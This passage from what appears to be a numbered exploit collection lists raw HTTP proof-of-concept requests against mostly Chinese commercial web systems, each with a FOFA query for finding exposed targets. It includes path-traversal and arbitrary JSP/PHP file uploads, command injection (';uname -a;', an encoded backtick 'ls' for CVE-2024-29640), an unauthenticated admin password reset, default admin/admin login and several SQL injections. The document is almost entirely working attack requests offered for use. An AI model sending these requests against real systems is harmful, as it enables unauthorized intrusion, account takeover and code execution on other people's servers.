Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit assetsmanager_upload endpoint file upload

1. Run the POC to obtain the CSRF value, then obtain the cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
Fofa:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--


/storage/uploads/tttt.php

200. SeaCMS 海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"

Obtain the __VIEWSTATE and __EVENTVALIDATION values
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0


Replace the __VIEWSTATE and __EVENTVALIDATION values
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--


/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
